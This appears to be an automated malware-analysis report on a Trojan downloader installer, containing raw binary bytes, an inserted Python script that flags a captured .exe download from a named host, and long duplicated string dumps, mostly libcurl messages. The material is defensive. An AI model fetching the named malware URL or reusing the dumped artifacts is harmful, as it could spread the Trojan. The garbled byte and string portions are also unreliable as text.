M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>
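Added example, not part of the report: Python that parses a captured request/response pair in the form shown above and flags it the way an IDS rule on this traffic would. Besides matching the MZ magic at the start of the body, which catches the download whatever Content-Type the server advertises, it compares the User-Agent's claimed Windows version with the analysis host's: the second request above claims Windows NT 5.0 (Windows 2000) while the sandbox runs Windows XP (NT 5.1), which marks that string as hard-coded in the downloader rather than supplied by WinINet. The sample bytes are constructed from the second transaction's headers with a short fabricated body; the host version is passed in as a parameter, and the finding labels are mine.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: the second transaction above (down.shm520.com), headers as captured,
# body replaced by a short fabricated DOS-stub prefix so the example runs offline.
SAMPLE = (
    b"GET /xlxc/Setup_95101248.exe HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    b"Accept: */*\r\n"
    b"Host: down.shm520.com\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 1363160\r\n"
    b"X-Server-IP: 183.131.193.67\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)


@dataclass
class Exchange:
    method: str
    path: str
    req_headers: Dict[str, str]
    status: int
    resp_headers: Dict[str, str]
    body: bytes


def _split_headers(block: bytes) -> Tuple[str, Dict[str, str]]:
    lines = block.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_exchange(raw: bytes) -> Exchange:
    """Parse 'request headers, blank line, response headers, blank line, body' as one stream."""
    req_block, _, rest = raw.partition(b"\r\n\r\n")
    resp_block, _, body = rest.partition(b"\r\n\r\n")
    request_line, req_headers = _split_headers(req_block)
    method, path, _ = request_line.split(" ", 2)
    status_line, resp_headers = _split_headers(resp_block)
    status = int(status_line.split(" ", 2)[1])
    return Exchange(method, path, req_headers, status, resp_headers, body)


EXE_TYPES = {"application/x-msdos-program", "application/x-msdownload", "application/octet-stream"}
NT_VERSION_RE = re.compile(r"Windows NT (\d+\.\d+)")


def triage(x: Exchange, host_nt_version: str) -> List[str]:
    """Findings for one exchange. host_nt_version is the NT version of the machine that
    sent the request (XP = '5.1'), taken from the sandbox description, not from the traffic."""
    hits: List[str] = []
    ctype = x.resp_headers.get("content-type", "").split(";")[0].strip().lower()
    if x.status == 200 and x.body.startswith(b"MZ"):
        # Magic-byte check: catches the PE whatever the server claims in Content-Type
        hits.append(f"pe-download: {x.req_headers.get('host', '?')}{x.path}")
        if ctype not in EXE_TYPES:
            hits.append(f"content-type-mismatch: PE body served as {ctype or 'no content-type'}")
    ua = x.req_headers.get("user-agent", "")
    m = NT_VERSION_RE.search(ua)
    if m and m.group(1) != host_nt_version:
        # A UA that mis-states the OS was not generated by WinINet on this host
        hits.append(f"ua-os-mismatch: claims NT {m.group(1)}, host is NT {host_nt_version}")
    if "referer" not in x.req_headers and x.path.lower().endswith(".exe"):
        hits.append("exe-fetch-without-referer: direct fetch rather than a browser click-through")
    return hits


if __name__ == "__main__":
    for hit in triage(parse_exchange(SAMPLE), host_nt_version="5.1"):
        print(hit)
```

The UA comparison only works when the host's version is known independently, which is why it is a parameter rather than something inferred from the capture; on a production sensor the same check can be keyed off the asset inventory for the source IP.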
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
Setup_95101248.exe_1596:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
`.reloc
KERNEL32.DLL
MsgWaitForMultipleObjects
BgWorker.dll
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
#hXXp://logo.verisign.com/vslogo.gif0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
Could not resolve %s: %s; %s
%s:%d
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Re-using existing connection! (#%ld) with host %s
%s://%s
IDN support not present, can't parse Unicode domains
malformed
:]://%[^
[^:]:%[^
Protocol %s not supported or disabled in libcurl
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
No URL set!
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
[^?&/:]://%c
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
WARNING: failed to save cookies in %s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
Send failure: %s
Recv failure: %s
[%s %s %s]
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getsockname() failed with errno %d: %s
getpeername() failed with errno %d: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
TCP_NODELAY set
Could not set TCP_NODELAY: %s
couldn't connect to %s at %s:%d
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Unknown error %d (%#x)
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Internal error removing splay node = %d
Internal error clearing splay node = %d
%d.%d.%d.%d
The requested URL returned error: %d
@I.po
6-q}k
version=1.0.1.8
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
in.html?
in.html?
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1248.exe
1248.exe
1638648
1638648
-2067134396
-2067134396
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
95101248.exe
95101248.exe
c:\Setup_95101248.exe
c:\Setup_95101248.exe
D:\Program Files\XxShow
D:\Program Files\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
Setup_95101248.exe
Setup_95101248.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
352650550
352650550
1245428
1245428
1114338
1114338
1114320
1114320
1573190
1573190
2162906
2162906
1376468
1376468
95101248
95101248
1507518
1507518
1573146
1573146
1507522
1507522
1507538
1507538
1048780
1048780
1442126
1442126
1573052
1573052
1835232
1835232
1376520
1376520
1638642
1638642
1310942
1310942
1310970
1310970
722076749
722076749
Nullsoft Install System v2.46
Nullsoft Install System v2.46
2.0.0.0
2.0.0.0
Setup_95101248.exe_1596_rwx_10004000_00001000:
callback%d
callback%d
uuuyunbo_53_1248.exe_1536:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u*@Sj%
8%u*@Sj%
t.Gj:W
t.Gj:W
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Internal error removing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
%s:%d
Hostname %s was found in DNS cache
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
smtp
smtp
;type=%c
;type=%c
Send failure: %s
Send failure: %s
Write callback asked for PAUSE when not supported!
Write callback asked for PAUSE when not supported!
[%s %s %s]
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Trying %s...
Immediate connect fail for %s: %s
Immediate connect fail for %s: %s
%s:%s
%s:%s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
The requested URL returned error: %d
The requested URL returned error: %d
%s auth using %s with user '%s'
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Modified-Since: %s
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
Referer: %s
Referer: %s
Accept-Encoding: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s
Host: %s%s%s:%hu
Host: %s%s%s:%hu
PTF://
PTF://
Range: bytes=%s
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
PTF://%s:%s@%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
%s%s=%s
Internal HTTP POST error!
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP POST request
Failed sending HTTP request
Failed sending HTTP request
operation aborted by callback
operation aborted by callback
Read callback asked for PAUSE when not supported!
Read callback asked for PAUSE when not supported!
seek callback returned error %d
seek callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
ioctl callback returned error %d
ioctl callback returned error %d
--:--:--
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d:d
d:d
d:d
0123456789
0123456789
Unsupported protocol
Unsupported protocol
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
HTTP response code said error
FTP: command PORT failed
FTP: command PORT failed
FTP: command REST failed
FTP: command REST failed
Operation was aborted by an application callback
Operation was aborted by an application callback
A libcurl function was given a bad argument
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Invalid LDAP URL
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Login denied
Login denied
TFTP: File Not Found
TFTP: File Not Found
TFTP: Access Violation
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: No such user
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Error in the SSH layer
Unable to parse FTP file list
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol option is unsupported
Protocol is unsupported
Protocol is unsupported
Socket is unsupported
Socket is unsupported
Operation not supported
Operation not supported
Address family not supported
Address family not supported
Protocol family not supported
Protocol family not supported
Winsock version not supported
Winsock version not supported
Unknown error %d (%#x)
Unknown error %d (%#x)
%d.%d.%d.%d
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
WSAStartup failed (%d)
WSAStartup failed (%d)
insufficient winsock version to support telnet
insufficient winsock version to support telnet
%s IAC %s
%s IAC %s
%s IAC %d
%s IAC %d
%s %s %s
%s %s %s
%s %s %d
%s %s %d
%s %d %d
%s %d %d
Sending data failed (%d)
Sending data failed (%d)
%s IAC SB
%s IAC SB
%s (unsupported)
%s (unsupported)
%d (unknown)
%d (unknown)
USER,%s
USER,%s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%c%c%c
%c%c%c%c
7[^,],7s
7[^,],7s
%c%s%c%s
%c%s%c%s
WS2_32.DLL
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
got option=(%s) value=(%s)
blksize is larger than max supported
blksize is larger than max supported
%s (%d)
%s (%d)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%ld)
%s (%ld)
%s (%d) %s (%d)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
%s%c%s%c
tftp_send_first: internal error
tftp_send_first: internal error
Received last DATA packet block %d again.
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
tftp_rx: internal error
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
TFTP finished
TFTP finished
bind() failed; %s
bind() failed; %s
TFTP response timeout
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
LDAP remote: %s
There are more than %d entries
There are more than %d entries
LOGIN %s %s
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
AUTHENTICATE %s
No known authentication mechanisms supported!
No known authentication mechanisms supported!
LIST "%s" *
LIST "%s" *
SELECT %s
SELECT %s
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
APPEND %s (\Seen) {%I64d}
SEARCH %s
SEARCH %s
LOGINDISABLED
LOGINDISABLED
STARTTLS not supported.
STARTTLS not supported.
STARTTLS denied. %c
STARTTLS denied. %c
Access denied. %c
Access denied. %c
IMAPS not supported!
IMAPS not supported!
%cd
%cd
%s %s
%s %s
USER %s
USER %s
APOP %s %s
APOP %s %s
AUTH %s %s
AUTH %s %s
AUTH %s
AUTH %s
STLS not supported.
STLS not supported.
Authentication failed: %d
Authentication failed: %d
PASS %s
PASS %s
POP3S not supported!
POP3S not supported!
SMTP
SMTP
EHLO %s
EHLO %s
HELO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:%s
RCPT TO:
RCPT TO:
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
Remote access denied: %d
Remote access denied: %d
Command failed: %d
Command failed: %d
MAIL failed: %d
MAIL failed: %d
RCPT failed: %d
RCPT failed: %d
DATA failed: %d
DATA failed: %d
SMTPS not supported!
SMTPS not supported!
PORT
PORT
Preparing for accepting server on data port
Preparing for accepting server on data port
FTP response timeout
FTP response timeout
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
CWD %s
CWD %s
getsockname() failed: %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
%s |%d|%s|%hu|
Failure sending EPRT command: %s
Failure sending EPRT command: %s
,%d,%d
,%d,%d
Failure sending PORT command: %s
Failure sending PORT command: %s
Connect data stream passively
Connect data stream passively
PRET %s
PRET %s
PRET STOR %s
PRET STOR %s
PRET RETR %s
PRET RETR %s
REST %d
REST %d
SIZE %s
SIZE %s
%s%s%s
%s%s%s
MDTM %s
MDTM %s
APPE %s
APPE %s
STOR %s
STOR %s
%c%c%c%u%c
%c%c%c%u%c
Illegal port number in EPSV reply
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
Failed to do PORT
dddddd
dddddd
ddd d:d:d GMT
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
unsupported MDTM reply format
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
ftp server doesn't support SIZE
RETR %s
RETR %s
Failed FTP upload:
Failed FTP upload:
RETR response: d
RETR response: d
PBSZ %d
PBSZ %d
ACCT %s
ACCT %s
Access denied: d
Access denied: d
ACCT rejected by server: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
PROT %c
Entry path is '%s'
Entry path is '%s'
QUOT command failed with d
QUOT command failed with d
MKD %s
MKD %s
Failed to MKD dir: d
Failed to MKD dir: d
PRET command not accepted: d
PRET command not accepted: d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
Failure sending ABOR command: %s
Failure sending ABOR command: %s
server did not report OK, got %d
server did not report OK, got %d
QUOT string not accepted: %s
QUOT string not accepted: %s
TYPE %c
TYPE %c
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Failure sending QUIT command: %s
Uploading to a URL without a file name!
Uploading to a URL without a file name!
FTPS not supported!
FTPS not supported!
Couldn't open file %s
Couldn't open file %s
Can't open %s for writing
Can't open %s for writing
Can't get the size of %s
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport:
Transport: %s
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
Range: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Session: %s
Session: %s
%s%s%s%s%s%s
%s%s%s%s%s%s
curl
curl
%sAuthorization: Digest %s
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s:%hu
%s%s%s:%hu
%s%s%s:%hu
Host: %s
Host: %s
CONNECT %s HTTP/%s
CONNECT %s HTTP/%s
%s%s%s%s
%s%s%s%s
HTTP/1.%d %d
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
.jpeg
.jpeg
.html
.html
; filename="%s"
; filename="%s"
%s; boundary=%s
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
Content-Type: %s
couldn't open file "%s"
couldn't open file "%s"
--%s--
--%s--
------------------------xx
------------------------xx
%c%c==
%c%c==
%c%c%c=
%c%c%c=
LOGIN
LOGIN
%s/%s
%s/%s
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
00000001
00000001
xxxx
xxxx
